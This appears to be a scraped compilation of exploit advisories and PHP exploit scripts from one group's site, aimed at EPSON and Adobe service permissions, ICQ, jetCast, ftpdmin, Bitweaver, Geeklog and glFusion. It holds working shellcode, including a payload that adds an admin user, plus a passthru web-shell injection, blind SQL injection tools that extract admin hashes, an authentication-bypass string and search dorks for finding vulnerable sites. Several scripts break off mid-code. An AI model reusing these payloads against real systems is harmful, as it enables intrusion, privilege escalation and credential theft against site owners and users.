http://msmvps.com/blogs/erikr/archive/2007/09/26/set-permissions-on-a-specific-service-windows.aspx original url: http://retrogod.altervista.org/9sg_adobe_pe_local.html
EPSON Status Monitor 3 local privilege escalation vulnerability
--- EPSON Status Monitor 3 local privilege escalation vulnerability by Nine:Situations:Group::bruiser site: http://retrogod.altervista.org/ After that pyrokinesis found: http://www.milw0rm.com/exploits/9199 I prepared a tool to check for weak permissions and I come out with this: C:\sc qc EPSON_EB_RPCV4_01 [SC] QueryServiceConfig SUCCESS SERVICE_NAME: EPSON_EB_RPCV4_01 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE LOAD_ORDER_GROUP : TAG: 0 DISPLAY_NAME : EPSON V5 Service4(01) DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem C:\CACLS C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE Everyone:F --[ :( !!!] C:\SC QC EPSON_PM_RPCV4_01 [SC] QueryServiceConfig SUCCESS SERVICE_NAME: EPSON_PM_RPCV4_01 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE LOAD_ORDER_GROUP : TAG: 0 DISPLAY_NAME : EPSON V3 Service4(01) DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem C:\CACLS C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE Everyone:F --[ :( !!!] The executable files are installed with full control for Everyone; replace them with your favourite rootkit. They are carried by an EPSON STYLUS SX100 drivers cd. C'mon guys, no need for an exploit code, it can be triggered by the availiable command line tools. original url: http://retrogod.altervista.org/9sg_EPSON_local.html
Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges by Nine:Situations:Group description: Adobe downloader used to download updates for Adobe applications. Shipped with Acrobat Reader 9.x vendor: Nos Microsystems poc: C:\sc qc getPlus(R) Helper [SC] GetServiceConfig SUCCESS SERVICE_NAME: getPlus(R) Helper TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe LOAD_ORDER_GROUP : TAG: 0 DISPLAY_NAME : getPlus(R) Helper DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem C:\cacls C:\Programmi\NOS\bin\getPlus_HelperSvc.exe C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F -- [!!!] NT AUTHORITY\SYSTEM:F The executable files is installed with improper permissions, with full control for Builtin Users; a simple user can replace it with a binary of choice. At the next reboot it will run with SYSTEM privileges. original url: http://retrogod.altervista.org/9sg_adobe_local.html
ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc
?php /* ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc by Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ If the resulting file is placed on the desktop, against ex. xp sp3 process explorer.exe will exit with code 1282 (0x502) that is ERROR_STACK_BUFFER_OVERRUN and crash infinitely, you cannot even browse a folder if the file is present in it Solution: disable the shell extension, you may try shellexview by nirsoft Note (added 30/05/2009, remote vector added): it works with network folders too ... against a win2k3 where explorer.exe is not patched with /GS flag: (f44.104): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=02100068 ebx=772a23c1 ecx=0210cefa edx=0823 esi=00610061 edi= eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202 SHLWAPI!Ordinal400+0x2d: 772a533f 668906 mov word ptr [esi],axds:0023:00610061= - 0:010 g (f44.104): Access violation - code c005 (!!! second chance !!!) eax=02100068 ebx=772a23c1 ecx=0210cefa edx=0823 esi=00610061 edi= eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202 SHLWAPI!Ordinal400+0x2d: 772a533f 668906 mov word ptr [esi],axds:0023:00610061= - 0:010 gn eax=0001 ebx= ecx= edx= esi= edi=0001 eip=7ffe0304 esp=0178fcf0 ebp=0178ff44 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0246 SharedUserData!SystemCallStub+0x4: 7ffe0304 c3 ret prepare a network folder with the .url file inside. This works against Internet Explorer too by a hyperlink to the network folder */ $x = [InternetShortcut]\x0d\x0a. URL=.str_repeat(\x61,2184); file_put_contents(9sg_poc.url,$x); ? #original url: http://retrogod.altervista.org/9sg_icq_dos.html
COWON America jetCast 2.0.4.1109 (.mp3) local heap buffer overlow exploit
?php
/*
COWON America jetCast 2.0.4.1109 (.mp3) local heap buffer overlow
exploit (xp/sp3)
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
software site: http://www.jetaudio.com/
Tested against JetAudio pack v.7.5.2
-
Passing an overlong string as id3 tag we have:
(370.7a8): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=0394 ecx=41414141 edx=00160608 esi=010c1a00
edi=0302fbc8
eip=00486db7 esp=0302fb14 ebp=0302fe7c iopl=0 nv up ei pl nz ac
po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=
efl=00010212
jetCast+0x86db7:
00486db7 8b11mov edx,dword ptr [ecx]
ds:0023:41414141=
code:
00486DB7 |. 8B11 MOV EDX,DWORD PTR DS:[ECX] ---crash
00486DB9 |. 8B8D ACFC MOV ECX,DWORD PTR SS:[EBP-354]
00486DBF |. FF52 0CCALL DWORD PTR DS:[EDX+C]
...
-
We have 4 bytes of ecx to redirect the program to edi, which keeps our
buffer.
To do that first we set ecx to a portion of memory which *always* (or
nearly) keeps
the filename.
Look 0x0105... no null char allowed, so I will use 0x01050101 to
hit the right
offset.
To build it we need an address which points to a known call edi,
compatible with
windows filenames. To achieve that you may do so:
x...@pyro ~/framework-2.2/tools
$ memdump (pid) jetcast
x...@pyro ~/framework-2.2/tools
$ cd ..
x...@pyro ~/framework-2.2/
$ msfpescan -d ./tools/jetcast/ -j edi
0x7d03388b call edi
...
x...@pyro ~/framework-2.2/tools
$ msfpescan -d ./tools/jetcast/ -x \x8b\x38\x03\x7d
0x028997c4 8b38037d
0x77e062f5 8b38037d
...
then subtract c. Repeat this for each call edi, took me some time to
find every
combination by a script and I finally found a good one in the
MSVCRT.DLL given
with the program; a third match seems not possible.
Note: first bytes of EDI keep some null chars, but as you can see, this
portion is nop-equivalent:
0348FBC8 ADD BYTE PTR DS:[EAX],AL
0348FBCA ADD BYTE PTR DS:[EAX],AL
0348FBCC ADD BYTE PTR DS:[EAX],AL
0348FBCE ADD BYTE PTR DS:[EAX],AL
0348FBD0 90 NOP
0348FBD1 90 NOP
0348FBD2 90 NOP
...
Usage: php 9sg_jetcast_poc.php
It creates 4 files on your desktop, it says which will hit the right
offset on
your system (file path is important to achieve arbitrary code execution
on a victim user
so an attacker should persuade him to try to stream them ...)
It works by dragging the file on it or by right clicking and selecting
Add files ...,
not 100% reliable, version specific...
-
*/
error_reporting(0);
if (php_sapi_name() cli)
{
die([!] Launch from the cli!);
}
$scode = \xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53.
\xbb\x0d\x25\x86\x7c. //WinExec, 0x7c86250d
\xff\xd3\x31\xc0\x50. \xbb\x12\xcb\x81\x7c. //ExitProcess,
0x7c81cb12
\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65.
\x78\x65\x20\x2f\x63\x20. cmd /c calc . \xff;
if (strlen($scode) 118)
{
die([!] Shellcode too large here!);
}
$BOOM =
\x49\x44\x33\x03\x00\x00\x00\x00\x07\x7b\x54\x49\x54\x32\x00\x00\x03\xbe\x00\x00\x00.
str_repeat(\x90, 0x7c).//nop, very reusable
\xeb\x06\x90\x90. //jmp short
//\x01\x01\x06\x01. //less usually in this location...
\x01\x01\x05\x01. //eax - ecx, this works 80% of the times
\x90\x90\x90\x90. //nop
$scode. str_repeat(A, 0x01f0 - strlen($scode)).
\x54\x41\x4c\x42\x00\x00\x00\x02\x00\x00\x00\x31\x54\x59\x45\x52\x00\x00\x00\x05\x00\x00\x00\x31\x39\x35\x30\x54\x43\x4f.
\x4e\x00\x00\x00\x02\x00\x00\x00\x31\x54\x43\x4f\x50\x00\x00\x00\x02\x00\x00\x00\x31\xff\xfb\x90\x64\x00\x00\x00\x00\x00\x00\x00.
Bitweaver = 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit
?php
/*
Bitweaver = 2.6 /boards/boards_rss.php / saveFeed() remote code execution
exploit
by Nine:Situations:Group::bookoo
php.ini independent
site: http://retrogod.altervista.org/
software site: http://www.bitweaver.org/
You need an user account and you need to change your display name in:
{php}passthru($_SERVER[HTTP_CMD]);{/php}
Register and click on Preferences, look at the User Information tab,
inside the
Real name text field write the code above, then click on Change.
Google dorks:
by bitweaver Version powered +boards
You are running bitweaver in TEST mode|bitweaver * White Screen of Death
Versions tested: 2.6.0, 2.0.2
Vulnerability type: folder creation, file creation, file overwrite, PHP
code injection.
Explaination:
look at /boards/boards_rss.php, line 102:
...
echo $rss-saveFeed( $rss_version_name, $cacheFile );
...
it calls saveFeed() function in an insecure way, arguments are built on
$_REQUEST[version] var and may contain directory traversal sequences...
now look at saveFeed() function in /rss/feedcreator.class.php
...
function saveFeed($filename=, $displayContents=true) {
if ($filename==) {
$filename = $this-_generateFilename();
}
if ( !is_dir( dirname( $filename ))) {
mkdir_p( dirname( $filename ));
}
$feedFile = fopen($filename, w+);
if ($feedFile) {
fputs($feedFile,$this-createFeed());
fclose($feedFile);
if ($displayContents) {
$this-_redirect($filename);
}
} else {
echo br /bError creating feed file, please check write
permissions./bbr /;
}
}
}
...
regardless of php.ini settings, you can create arbitrary folders,
create/overwrite
files, also you can end the path with an arbitrary extension, other than
.xml passing
a null char.
ex.
http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../bookoo.php%00
now you have a bookoo.php in main folder:
?xml version=1.0 encoding=UTF-8?
!-- generator=FeedCreator 1.7.2 --
?xml-stylesheet href=http://www.w3.org/2000/08/w3c-synd/style.css;
type=text/css?
rss version=0.91
channel
title Feed/title
description/description
linkhttp://192.168.0.1/link
lastBuildDateSat, 09 May 2009 20:01:44 +0100/lastBuildDate
generatorFeedCreator 1.7.2/generator
languageen-us/language
/channel
/rss
You could inject php code by the Host header (but this is used to build
filenames and
create problems, also most of servers will respond with an http error)
inside link tag
or by your display name in title tag, ex.:
http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../bookoo_ii.php%00u=bookoop=password
and here it is the new file (if your display name is ?php
passthru($_GET[cmd]; ?):
?xml version=1.0 encoding=UTF-8?
!-- generator=FeedCreator 1.7.2 --
?xml-stylesheet href=http://www.w3.org/2000/08/w3c-synd/style.css;
type=text/css?
rss version=0.91
channel
title Feed (?php passthru($_GET[cmd]; ?))/title
description/description
linkhttp://192.168.0.1/link
lastBuildDateTue, 12 May 2009 00:30:54 +0100/lastBuildDate
generatorFeedCreator 1.7.2/generator
languageen-us/language
/channel
/rss
if short_open_tag in php.ini is off (because of ?xml ... preamble
generating a parse error with short_open_tag = on), you can now launch
commands:
http://host/path_to_bitweaver/bookoo_ii.php?cmd=ls
However, to bypass short_open_tag = on you can inject in a template file,
ex.:
http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../themes/templates/footer_inc.tpl%00u=bookoop=password
Now footer_inc.tpl looks like this:
?xml version=1.0 encoding=UTF-8?
!-- generator=FeedCreator 1.7.2 --
?xml-stylesheet href=http://www.w3.org/2000/08/w3c-synd/style.css;
type=text/css?
rss version=0.91
channel
title Feed ({php}passthru($_GET[CMD]);{/php})/title
description/description
linkhttp://192.168.0.1/link
lastBuildDateTue, 12 May 2009 00:43:01 +0100/lastBuildDate
generatorFeedCreator 1.7.2/generator
languageen-us/language
/channel
/rss
note that the shellcode is in Smarty template syntax ...
Now you can launch commands from the main page:
http://host/path_to_bitweaver/index.php?cmd=ls%20-la
or
http://host/path_to_bitweaver/wiki/index.php?cmd=ls%20-la
Additional notes:
Without to have an account you can create a denial of service condition,
ex. by replacing the main index.php:
http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../index.php%00
I found also a bug in Smarty template system,
Geeklog = 1.5.2 savepreferences()/*blocks[] remote sql injection exploit
?php
/*
Geeklog = 1.5.2 savepreferences()/*blocks[] remote sql injection exploit
by Nine:Situations:Group::bookoo
our site: http://retrogod.altervista.org/
software site: http://www.geeklog.net/
PHP and MySQL version independent
vulnerability, see usersettings.php near lines 1467 - 1480:
...
if (isset ($_USER['uid']) ($_USER['uid'] 1)) {
switch ($mode) {
case 'saveuser':
savepreferences ($_POST);
$display .= saveuser($_POST);
PLG_profileExtrasSave ();
break;
case 'savepreferences':
savepreferences ($_POST);
$display .= COM_refresh ($_CONF['site_url']
. '/usersettings.php?mode=preferencesamp;msg=6');
break;
...
all the $_POST[] variables are passed to the savepreferences() function
now look the function always in usersettings.php:
...
function savepreferences($A) {
global $_CONF, $_TABLES, $_USER;
if (isset ($A['noicons']) ($A['noicons'] == 'on')) {
$A['noicons'] = 1;
} else {
$A['noicons'] = 0;
}
if (isset ($A['willing']) ($A['willing'] == 'on')) {
$A['willing'] = 1;
} else {
$A['willing'] = 0;
}
if (isset ($A['noboxes']) ($A['noboxes'] == 'on')) {
$A['noboxes'] = 1;
} else {
$A['noboxes'] = 0;
}
if (isset ($A['emailfromadmin']) ($A['emailfromadmin'] == 'on')) {
$A['emailfromadmin'] = 1;
} else {
$A['emailfromadmin'] = 0;
}
if (isset ($A['emailfromuser']) ($A['emailfromuser'] == 'on')) {
$A['emailfromuser'] = 1;
} else {
$A['emailfromuser'] = 0;
}
if (isset ($A['showonline']) ($A['showonline'] == 'on')) {
$A['showonline'] = 1;
} else {
$A['showonline'] = 0;
}
$A['maxstories'] = COM_applyFilter ($A['maxstories'], true);
if (empty ($A['maxstories'])) {
$A['maxstories'] = 0;
} else if ($A['maxstories'] 0) {
if ($A['maxstories'] $_CONF['minnews']) {
$A['maxstories'] = $_CONF['minnews'];
}
}
$TIDS = @array_values($A[$_TABLES['topics']]);
$AIDS = @array_values($A['selauthors']);
$BOXES = @array_values($A[{$_TABLES['blocks']}]); //- this is
$_POST[(prefix)blocks]
$ETIDS = @array_values($A['etids']);
$tids = '';
if (sizeof ($TIDS) 0) {
$tids = addslashes (implode (' ', $TIDS));
}
$aids = '';
if (sizeof ($AIDS) 0) {
$aids = addslashes (implode (' ', $AIDS));
}
$selectedblocks = '';
if (count ($BOXES) 0) {
$boxes = addslashes (implode (',', $BOXES)); //-- this
addslashes() is totally unuseful
// SQL INJECTION HERE *** $boxes is not surrounded by quotes!
$blockresult = DB_query(SELECT bid,name FROM {$_TABLES['blocks']} WHERE
bid NOT IN ($boxes));
$numRows = DB_numRows($blockresult);
for ($x = 1; $x = $numRows; $x++) {
$row = DB_fetchArray ($blockresult);
if ($row['name'] 'user_block' AND $row['name'] 'admin_block' AND
$row['name'] 'section_block') {
$selectedblocks .= $row['bid'];
if ($x $numRows) {
$selectedblocks .= ' ';
}
}
}
}
...
read the lines commented!
This tool extracts the admin hash from db by asking true/false questions
to MySQL and interpreting some checkboxes in response, but requires a
simple user account.
vulnerability ii, information disclosure:
now I see that table prefix is showed inside html because they used table
names for the $_TABLES[] array
*/
$err[0] = [!] This script is intended to be launched from the cli!;
$err[1] = [!] You need the curl extesion loaded!;
if (php_sapi_name() cli) {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl(php_curl.dll) ? die($err[1]) :
nil;
} else {
!dl(php_curl.so) ? die($err[1]) :
nil;
}
}
function syntax() {
print (
Syntax: php .$argv[0]. [host] [path] [user] [pass] [OPTIONS]
\n. Options:
\n. --c:[uid:hash] - use your user cookie, instead of uses/pwd pair
\n. --port:[port] - specify a port
\n. default-80
\n. --uid:[n] - specify an uid other than default (2,usually
admin)\n. --proxy:[host:port] - use proxy
\n. --skiptest - skip preliminary tests
\n. --test - run only tests
\n. Examples: php .$argv[0]. 192.168.0.1 /geeklog/ bookoo pass
\n. php .$argv[0]. 192.168.0.1 / bookoo pass
--proxy:1.1.1.1:8080\n. php .$argv[0].
ftpdmin v. 0.96 RNFR remote buffer overflow exploit
?php
/*
ftpdmin v. 0.96 RNFR remote buffer overflow exploit (xp sp3 / case study)
by Nine:Situations:Group::surfista
software site: http://www.sentex.net/~mwandel/ftpdmin/
our site: http://retrogod.altervista.org/
bug found by rgod in 2006, RNFR sequences can trigger a simple eip overwrite.
We can use 272 bytes before EIP and 119 after EIP, ESP and EBP points to
the second memory region.
We have a very small set of chars that we can use ,RNFR (Rename From)
command
accept pathnames as argument, so characters whose integer representations
are
in the range from zero through 31 and reserved chars are not allowed!
*/
error_reporting(7);
$ftp_server = 192.168.0.1;
$ftp_user = anonymous;
$ftp_pass = a...@email.com;
function ftp_cmd($cmd){
global $conn_id;
echo - .$cmd.\n;
$buff=ftp_raw($conn_id,$cmd);
}
#WinExec shellcode of mine, enconded with the alpha2 tool by
SkyLined, adds
#a surfista admin user with pass pass
#contains hardcoded address, re-encode command:
#alpha2 esp shdmp.txt
$scode=TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI.
Xkb3SkfQkpBp4qo0nhBcaZPSMknMq3mValkOYCtqYPYxxhKO9okOe3BMrD5pTocS5.
prnReqDWPCev32e1BWPt3sEQbRFE9T3PtqqWPRPSQPsBSUpTosqctRdWPGVa6epPN.
w5F4EpRlRossG1PLw7brpOrupP5paQ1tPmaypnSYbSPtd2Pa44BOT2T3UpfOw1qTw.
4gPqcpupr3VQybSrTE1kOA;
#do not touch, esp adjustment and subsequent call esp, very
large but we have lots of unused space
$code
=TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI.
NcXl1oK3JLsOOs8lSOMSXlQoK3zL14KOm4F22EbSrOpusBSSsUGPpipdUpesVVA;
if (strlen($scode) 272) {die([!] shellcode too large!);}
$conn_id = ftp_connect($ftp_server) or die((!) Unable to
connect to $ftp_server);
if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) {
echo (*) Connected as $ftp_u...@$ftp_server\n;
} else {
die((!) Unable to connect as $ftp_user\n);
}
$jnk = str_repeat(\x66,272 - strlen($scode));
$eip=\x44\x3a\x41\x7e; //0x7E413A44 jmp esp,
user32.dll xp sp3
$jnk_ii = str_repeat(\x66,119 - strlen($code));
$bof=$scode.$jnk.$eip.$code.$jnk_ii;
$boom=RNFR .str_repeat(x,0x0096);
ftp_cmd($boom);
$boom=RNFR .$bof;
ftp_cmd($boom);
$boom=RNFR .str_repeat(x,0x0208);
ftp_cmd($boom);
ftp_close($conn_id);
echo (*) Done !\n;
?
url: http://retrogod.altervista.org/9sg_ftpdmin_096_rnfr_bof.html
Geeklog =1.5.2 'SESS_updateSessionTime()' vulnerability
As the vendor stated, see: http://www.geeklog.net/article.php/geeklog-1.5.2sr2 geeklog is also vulnerable to this: http://www.securityfocus.com/bid/34361/info actually this should be renamed in glFusion 'SESS_updateSessionTime()' SQL Injection Vulnerability
Geeklog =1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit
?php
/*
Geeklog =1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit
by Nine:Situations:Group::bookoo
our site: http://retrogod.altervista.org/
software site: http://www.geeklog.net/
credit goes to rgod, bug found more than a year ago
working against PHP = 5.0
google dorks: By Geeklog Created this page in +seconds +powered
By Geeklog Created this page in +seconds +powered
inurl:public_html
vulnerability, see /public_html/webservices/atom/index.php near lines 34-53:
...
require_once '../../lib-common.php';
if (PHP_VERSION 5) {
$_CONF['disable_webservices'] = true;
} else {
require_once $_CONF['path_system'] . '/lib-webservices.php';
}
if ($_CONF['disable_webservices']) {
COM_displayMessageAndAbort($LANG_404[3], '', 404, 'Not Found');
}
header('Content-type: ' . 'application/atom+xml' . '; charset=UTF-8');
WS_authenticate();
...
now WS_authenticate() function in /system/lib-webservices.php near lines
780-877:
...
function WS_authenticate()
{
global $_CONF, $_TABLES, $_USER, $_GROUPS, $_RIGHTS, $WS_VERBOSE;
$uid = '';
$username = '';
$password = '';
$status = -1;
if (isset($_SERVER['PHP_AUTH_USER'])) {
$username = $_SERVER['PHP_AUTH_USER'];
$password = $_SERVER['PHP_AUTH_PW'];
if ($WS_VERBOSE) {
COM_errorLog(WS: Attempting to log in user '$username');
}
} elseif (!empty($_SERVER['REMOTE_USER'])) {
list($auth_type, $auth_data) = explode(' ', $_SERVER['REMOTE_USER']);
list($username, $password) = explode(':', base64_decode($auth_data));
if ($WS_VERBOSE) {
COM_errorLog(WS: Attempting to log in user '$username' (via
\$_SERVER['REMOTE_USER']));
}
} else {
if ($WS_VERBOSE) {
COM_errorLog(WS: No login given);
}
}
...
and after, near lines 907-909:
...
if (($status == -1) $_CONF['user_login_method']['standard']) {
$status = SEC_authenticate($username, $password, $uid);
}
...
now open /system/lib-security.php near lines 695-717:
...
function SEC_authenticate($username, $password, $uid)
{
global $_CONF, $_TABLES, $LANG01;
$result = DB_query(SELECT status, passwd, email, uid FROM
{$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or
(remoteservice = ''))); //--- SQL INJECTION HERE
$tmp = DB_error();
$nrows = DB_numRows($result);
if (($tmp == 0) ($nrows == 1)) {
$U = DB_fetchArray($result);
$uid = $U['uid'];
if ($U['status'] == USER_ACCOUNT_DISABLED) {
// banned, jump to here to save an md5 calc.
return USER_ACCOUNT_DISABLED;
} elseif ($U['passwd'] != SEC_encryptPassword($password)) {
return -1; // failed login
} elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) {
return USER_ACCOUNT_AWAITING_APPROVAL;
} elseif ($U['status'] == USER_ACCOUNT_AWAITING_ACTIVATION) {
// Awaiting user activation, activate:
DB_change($_TABLES['users'], 'status', USER_ACCOUNT_ACTIVE,
'username', $username);
return USER_ACCOUNT_ACTIVE;
} else {
return $U['status']; // just return their status
}
} else {
$tmp = $LANG01[32] . : ' . $username . ';
COM_errorLog($tmp, 1);
return -1;
}
}
...
you can inject sql code in the 'username' argument of this function, it may
come from $_SERVER['PHP_AUTH_USER'] or $_SERVER['REMOTE_USER'] php
variables.
Theese vars are used for both HTTP Basic and Digest Authentication methods,
see PHP manual:
http://www.php.net/manual/en/features.http-auth.php
manual poc, visit http://host/path_to_geeklog/webservices/atom/index.php
then type:
username: ' AND 0 UNION SELECT 3,MD5(''),null,2 FROM gl_users LIMIT 1/*
password:
authentication mechanism is bypassed!
Note that it is passed base64_encode()'d !
Now you have access to some dangerous functions:
service_submit_staticpages()
service_delete_staticpages()
service_get_staticpages()
service_getTopicList_staticpages()
in /plugins/staticpages/services.inc.php
service_submit_story()
service_delete_story()
service_get_story()
service_getTopicList_story()
in /system/lib-story.php
ex. the service_submit_staticpages() one allows to specify a dangerous
sp_php flag in submitting staticpages; if the staticapages.PHP permission
is set to true for the staticpage admin (not the default), the page will be
glFusion = 1.1.2 COM_applyFilter()/cookies remote blind sql injection exploit
?php
/*
glFusion = 1.1.2 COM_applyFilter()/cookies remote blind sql injection
exploit
by Nine:Situations:Group::bookoo
our site: http://retrogod.altervista.org/
software site: http://www.glfusion.org/
google dork: Page created in seconds by glFusion +RSS
Found another vector of injection in /private/system/lib-session.php near
lines 97-117:
...
if (isset ($_COOKIE[$_CONF['cookie_session']])) {
$sessid = COM_applyFilter ($_COOKIE[$_CONF['cookie_session']]);
if ($_SESS_VERBOSE) {
COM_errorLog(got $sessid as the session id from lib-sessions.php,1);
}
$userid = SESS_getUserIdFromSession($sessid,
$_CONF['session_cookie_timeout'], $_SERVER['REMOTE_ADDR'], $_CONF['cookie_ip']);
if ($_SESS_VERBOSE) {
COM_errorLog(Got $userid as User ID from the session ID,1);
}
if ($userid 1) {
// Check user status
$status = SEC_checkUserStatus($userid);
if (($status == USER_ACCOUNT_ACTIVE) ||
($status == USER_ACCOUNT_AWAITING_ACTIVATION)) {
$user_logged_in = 1;
SESS_updateSessionTime($sessid, $_CONF['cookie_ip']);
...
see SESS_updateSessionTime() function near lines 418-436:
...
function SESS_updateSessionTime($sessid, $md5_based=0) {
global $_TABLES;
$newtime = (string) time();
if ($md5_based == 1) {
$sql = UPDATE {$_TABLES['sessions']} SET start_time=$newtime WHERE
(md5_sess_id = '$sessid');
} else {
$sql = UPDATE {$_TABLES['sessions']} SET start_time=$newtime WHERE
(sess_id = $sessid); // SQL INJECTION HERE
}
$result = DB_query($sql);
return 1;
}
...
if session id is not md5() hashed in general configuration, which is the
default
you can inject arbitrary SQL statements.
Note that the query in SESS_getUserIdFromSession() function:
...
if ($md5_based == 1) {
$sql = SELECT uid FROM {$_TABLES['sessions']} WHERE
. (md5_sess_id = '$sessid') AND (start_time $mintime) AND (remote_ip =
'$remote_ip');
} else {
$sql = SELECT uid FROM {$_TABLES['sessions']} WHERE
. (sess_id = '$sessid') AND (start_time $mintime) AND (remote_ip =
'$remote_ip');
}
...
compares the supplied sessid value with the sessid value from sessions
table which is an integer.
Mysql, like php, in comparing them, only considers the first integer values
of the supplied string.
So the function returns a valid userid and, if you know an existent sessid
in table, you can inject
queries in cookies, like this:
Cookie: glf_session=12345678 [SQL HERE]; glfusion=99;
This tool use delays to extract an admin hash from users table, but needs a
simple user account;
some improvement in find_prefix();
working against MySQL = 5.0.12, where SLEEP() function is availiable
or ... if you find another solution for delays, with MySQL = 4.1, which
supports SELECT subqueries
(BENCHMARK() cannot be used because commas are filtered by
COM_applyFilter() function)
*/
$err[0] = [!] This script is intended to be launched from the cli!;
$err[1] = [!] You need the curl extesion loaded!;
if (php_sapi_name() cli) {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl(php_curl.dll) ? die($err[1]) :
nil;
} else {
!dl(php_curl.so) ? die($err[1]) :
nil;
}
}
function syntax() {
print (
Syntax: php .$argv[0]. [host] [path] [user] [pass] [OPTIONS]
\n. Options:
\n. --port:[port] - specify a port
\n. default-80
\n. --prefix- try to extract table prefix from
information.schema\n. default-gl_
\n. --uid:[n] - specify an uid other than default
(2,usually admin)\n. --proxy:[host:port] - use proxy
\n. --verbose - show more informations
\n. --skiptest - skip preliminary tests
\n. --test - run only tests
\n. Examples: php .$argv[0]. 192.168.0.1 /glfusion/ bookoo
pass \n. php .$argv[0]. 192.168.0.
1 / bookoo pass --prefix --proxy:1.1.1.1:8080\n. php
.$argv[0]. 192.168.0.1 / bookoo pass --prefix --uid:3);
die();
}
error_reporting(E_ALL ^ E_NOTICE);
$host = $argv[1];
$path = $argv[2];
$_user = $argv[3];
$_pwd = $argv[4];
$prefix = gl_;
glFusion = 1.1.2 COM_applyFilter()/order sql injection exploit
?php
/*
glFusion = 1.1.2 COM_applyFilter()/order sql injection exploit
by Nine:Situations:Group::bookoo
working against Mysql = 4.1
php.ini independent
our site: http://retrogod.altervista.org/
software site: http://www.glfusion.org/
google dork: Page created in seconds by glFusion +RSS
Vulnerability, sql injection in 'order' and 'direction' arguments:
look ExecuteQueries() function in
/private/system/classes/listfactory.class.php, near line 336:
...
// Get the details for sorting the list
$this-_sort_arr['field'] = isset($_REQUEST['order']) ?
COM_applyFilter($_REQUEST['order']) : $this-_def_sort_arr['field'];
$this-_sort_arr['direction'] = isset($_REQUEST['direction']) ?
COM_applyFilter($_REQUEST['direction']) : $this-_def_sort_arr['direction'];
if (is_numeric($this-_sort_arr['field'])) {
$ord = $this-_def_sort_arr['field'];
$this-_sort_arr['field'] = SQL_TITLE;
} else {
$ord = $this-_sort_arr['field'];
}
$order_sql = ' ORDER BY ' . $ord . ' ' .
strtoupper($this-_sort_arr['direction']);
...
filters are inefficient, see COM_applyFilter() which calls
COM_applyBasicFilter()
in /public/lib-common.php near line 5774.
We are in an ORDER clause and vars are not surrounded by quotes,
bad chars are ex. , , / ,', ;, \,,*,`
but what about spaces and (... you can use a CASE WHEN .. THEN ..
ELSE .. END
construct instead of ex. IF(..,..,..) and -- instead of /* to
close
your query.
And ex. the alternative syntax SUBSTR(str FROM n FOR n) instead of
SUBSTR(str,n,n) in a sub-SELECT statement.
Other attacks are possible, COM_applyFilter() is a very common used
one.
Additional notes: 'direction' argument is uppercased by strtoupper(),
you know that table identifiers on Unix-like systems are case
sensitives
but not on MS Windows, however I choosed to inject in the 'order' one
for better results.
Vars come from the $_REQUEST[] array so you can pass it by $_POST[] or
$_COOKIE[], which is not intended I suppose.
This exploit extracts the hash from users table; also note that you do
not need to crack the hash, you can authenticate as admin with the
cookie:
glfusion=[uid]; glf_password=[hash];
as admin you can upload php files in public folders!
Very soft mitigations: glFusion does not show the table prefix in sql
errors, default however is 'gl_'. I prepared a fast routine to extract
it from information_schema db if availiable.
To successfully interrogate MySQL you need at least 2 records in the
same topic section, however the default installation create 2 links with
topic glFusion
